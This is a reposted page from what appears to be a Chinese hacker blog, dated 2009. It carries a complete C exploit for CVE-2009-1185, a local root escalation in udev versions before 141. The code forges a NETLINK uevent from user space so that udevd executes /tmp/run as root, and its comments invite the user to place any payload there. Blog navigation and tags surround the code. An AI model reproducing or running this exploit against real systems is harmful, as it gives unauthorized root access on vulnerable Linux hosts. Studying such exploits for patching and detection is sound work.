Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit

/*

* cve-2009-1185.c

*

* udev < 141 Local Privilege Escalation Exploit

* Jon Oberheide <jon@oberheide.org>

* http://jon.oberheide.org

*

* Information:

*

* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185

*

* udev before 1.4.1 does not verify whether a NETLINK message originates

* from kernel space, which allows local users to gain privileges by sending

* a NETLINK message from user space.

*

* Notes:

*

* An alternate version of kcope's exploit. This exploit leverages the

* 95-udev-late.rules functionality that is meant to run arbitrary commands

* when a device is removed. A bit cleaner and reliable as long as your

* distro ships that rule file. The exploit will execute /tmp/run as root

* so throw whatever payload you want in there.

*

* Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,

* usually is the udevd PID minus 1) as argv[1].

*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

int
main(int argc, char **argv)
{
	int sock;
	char *mp;
	char message[4096];
	struct msghdr msg;
	struct iovec iovector;
	struct sockaddr_nl address;

	memset(&address, 0, sizeof(address));
	address.nl_family = AF_NETLINK;
	address.nl_pid = atoi(argv[1]);
	address.nl_groups = 0;

	msg.msg_name = (void*)&address;
	msg.msg_namelen = sizeof(address);
	msg.msg_iov = &iovector;
	msg.msg_iovlen = 1;

	sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
	bind(sock, (struct sockaddr *) &address, sizeof(address));

	mp = message;
	mp += sprintf(mp, "a@/d") + 1;
	mp += sprintf(mp, "SUBSYSTEM=block") + 1;
	mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
	mp += sprintf(mp, "TIMEOUT=10") + 1;
	mp += sprintf(mp, "ACTION=remove") +1;
	mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;

	iovector.iov_base = (void*)message;
	iovector.iov_len = (int)(mp-message);

	sendmsg(sock, &msg, 0);

	close(sock);

	return 0;
}

原创文章如转载，请注明：转载自心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]

本文链接地址：http://www.abcxd.com/abcxd/abcxdArticle/linuxoday/LinuxKernel2.6-141.html

导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

2009-5-1 16:17:16

Tags: Exploit Linux UDEV 提权 本地提权 漏洞

发布:kissjetg | 分类:(K:)Linux漏洞 | 评论:0 | 引用:0 | 浏览:

黑客榜之热文排行

黑客榜之本年排行

黑客榜之本月排行

黑客榜之随机文章

网站分类

搜索内容

最新评论及回复

最近发表

所属分类下的文章

日历

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved

导航

心动吧黑客BLOG

2009-5-1 16:17:16